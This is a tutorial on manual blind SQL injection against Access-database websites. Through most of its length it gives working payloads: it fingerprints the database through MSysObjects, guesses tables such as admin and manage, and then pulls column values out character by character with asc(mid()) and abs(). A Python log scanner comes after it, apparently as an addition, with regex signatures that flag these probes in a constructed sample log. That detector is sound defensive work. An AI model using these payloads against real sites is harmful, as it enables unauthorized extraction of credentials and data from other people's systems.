Access manual injection actual combat

When injecting an ACCESS database you cannot enumerate table names the way you can with MySQL; you can only guess them one by one.


1. After finding the website, check whether it is an ACCESS database.

    Construct the payload URL + and exists (select id from MSysAccessObjects). If the page returns normally, it is an Access database.

             and (select count(*) from msysobjects)>0    if this reports insufficient permission, it is an Access database
             and (select count(*) from sysobjects)>0     if this returns normally, it is an MSSQL database

    The idea is to make the application report an error, because the error message contains database information.


2. Append and 1=1 (page displays normally) and and 1=2 (page errors) to confirm that the parameter really is an injection point.

3. URL + and 0<=(select count(*) from admin) and 1<2    Check the returned result: an error appears, which means there is no admin table. (Guess using common table names.) The shorter form and (select count(*) from admin) also works.

4. URL + and 0<=(select count(*) from manage) and 1<2    Check the returned result: the normal page comes back, which means the database contains a manage table. The shorter form and (select count(*) from manage) also works.

   Try other table names one by one in the same way.

5. Having confirmed that the manage table exists, determine how many records it contains.

      payload: and (select count(*) from guessed table name)>X    (X is a number; > can also be replaced with = or <)

      Try: and (select count(*) from manage)>0 and see whether the normal page is returned. A normal page means there are more than 0 records. Then keep changing X to narrow down the record count. In this test there turned out to be only one record.

6. Knowing that the manage table holds only one record, the next step is to guess its column names.

      Payload: (select count(username) from manage)    This tests whether the manage table has a username column. Then replace username with other commonly used column names such as password, id and so on.

7. Once the column names are known, guess the length of each field value.

        Payload: and (select top 1 len(column) from table)>X, where select top 1 means query the first record. (To query the length of a value in the second record, the value of the first record must be determined first.)

        payload: and (select top 1 len(username) from manage)>4    returns the normal page, so the first field value is longer than 4

        payload: and (select top 1 len(username) from manage)>5    returns the error page, so the first field value is not longer than 5. Together these show the first field value has length 5.

8. Determine the field values.

   payload: and (select top 1 asc(mid(field name, X, 1)) from table name)>N, where N and X are numbers. top 1 again means querying the first record.

   The asc() function returns the ASCII code of the string in its parentheses. (What is ASCII? A computer counts in binary internally, so how can it recognise decimal numbers, characters and graphics? In fact numeric data, text, graphics and so on are all represented inside the computer by a coding standard; through that standard they are converted into binary numbers for processing, and after processing the computer converts the result back into visible information for display. The commonly used character code is ASCII, which was originally a national standard of the United States and was adopted as an international standard in 1967.) For example, the ASCII code for a is 97.

   mid(field name, A, N) extracts N characters from the field in its parentheses, starting at the A-th character. For example, mid(username, 2, 3) takes 3 characters from the username field starting at the second character, inclusive; if the value is admin, the extracted value is dmi. Above we used mid(field name, X, 1): the last number is 1 because it sits inside asc(), and asc() converts only a single character into its ASCII code, so when mid() extracts the column value only one character at a time is taken.

    Construct the payload: and (select top 1 asc(mid(username,1,1)) from manage)>96    The page returns normally, indicating that the ASCII code of the first character in the username column is greater than 96.

    and (select top 1 asc(mid(username,1,1)) from manage)>97    The page returns the error page, indicating that the ASCII code of the first character in the username column is not greater than 97. Together these show the code is 97, which is the letter a.

    Then construct the payload and (select top 1 asc(mid(username,2,1)) from manage)>97 to guess the second character, and continue in the same way for the characters that follow. Every field value can be extracted this way.

9. Sometimes the data contains Chinese characters, for example the value in the username column is "administrator" written in Chinese; then the ASCII code cannot be obtained in the way above.

10. When guessing a column value character by character, sometimes even the >0 test returns the error page! If the value is not greater than 0, the ASCII code at that position is a negative number, which means it is a Chinese character! To obtain its ASCII code we need another function: abs() returns the absolute value of a number! Adding it to the statement lets us guess the code in the usual way: and (select top 1 abs(asc(mid(column,X,1))) from admin)>N. Don't forget to put the minus sign back after guessing the value.

11. Union queries can also be tried.
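From the defender's side, the probes in steps 1 to 10 leave a recognisable trail in web-server logs: a fingerprint query, then count(*) table guesses, count(column) guesses, len() probes and asc(mid()) probes, usually from one client with alternating normal/error responses. The following Python is an added example, not code from the original article: it flags those Access/Jet patterns in access-log lines and reports clients that went through several stages. The signature names, regexes and log lines are my own construction.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus
# Signatures for the Access/Jet probes walked through above, matched on the
# URL-decoded, lower-cased query string. Names and patterns are constructed here.
SIGNATURES = [(n, re.compile(rx)) for n, rx in [
    ("boolean-toggle", r"\band\s+1\s*=\s*[12]\b"),
    ("db-fingerprint", r"\bfrom\s+(msysobjects|msysaccessobjects|sysobjects)\b"),
    ("table-guess",    r"\bselect\s+count\(\*\)\s+from\s+\w+\s*\)\s*[<>=]"),
    ("column-guess",   r"\bselect\s+count\(\w+\)\s+from\s+\w+\s*\)"),
    ("length-probe",   r"\bselect\s+top\s+1\s+len\(\w+\)\s+from\b"),
    ("char-probe",     r"\b(abs\()?asc\(mid\(\w+\s*,\s*\d+\s*,\s*1\s*\)\)"),
]]
LOG_RE = re.compile(r'^(\S+) "GET (\S+) HTTP/[\d.]+" (\d{3})$')
# Constructed sample log (client ip, request line, status); not real traffic.
SAMPLE_LOG = """\
10.0.0.7 "GET /news.asp?id=12+and+1%3D1 HTTP/1.1" 200
10.0.0.7 "GET /news.asp?id=12+and+1%3D2 HTTP/1.1" 500
10.0.0.7 "GET /news.asp?id=12+and+(select+count(*)+from+msysobjects)%3E0 HTTP/1.1" 500
10.0.0.7 "GET /news.asp?id=12+and+(select+count(*)+from+manage)%3E0 HTTP/1.1" 200
10.0.0.7 "GET /news.asp?id=12+and+(select+count(username)+from+manage)%3E0 HTTP/1.1" 200
10.0.0.7 "GET /news.asp?id=12+and+(select+top+1+len(username)+from+manage)%3E4 HTTP/1.1" 200
10.0.0.7 "GET /news.asp?id=12+and+(select+top+1+asc(mid(username,1,1))+from+manage)%3E96 HTTP/1.1" 200
10.0.0.9 "GET /search.asp?q=select+your+plan HTTP/1.1" 200
"""

def classify_request(url):
    """Return the set of signature names matching the decoded query string of a URL."""
    query = unquote_plus(url.split("?", 1)[1]).lower() if "?" in url else ""
    return {name for name, rx in SIGNATURES if rx.search(query)}

def scan_log(text):
    """Yield (ip, status, hits) for every log line whose query matches a signature."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, url, status = m.groups()
        hits = classify_request(url)
        if hits:
            yield ip, int(status), hits

def suspicious_clients(text, min_requests=3):
    """Map each client with at least min_requests flagged requests to the sorted list
    of probe stages it used; several stages from one client is the enumeration sequence."""
    counts, stages = Counter(), {}
    for ip, _status, hits in scan_log(text):
        counts[ip] += 1
        stages.setdefault(ip, set()).update(hits)
    return {ip: sorted(stages[ip]) for ip, n in counts.items() if n >= min_requests}
```

A plain word like "select" in a search box (the 10.0.0.9 line) does not trip any signature, because each pattern requires the Access function shapes the article relies on.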
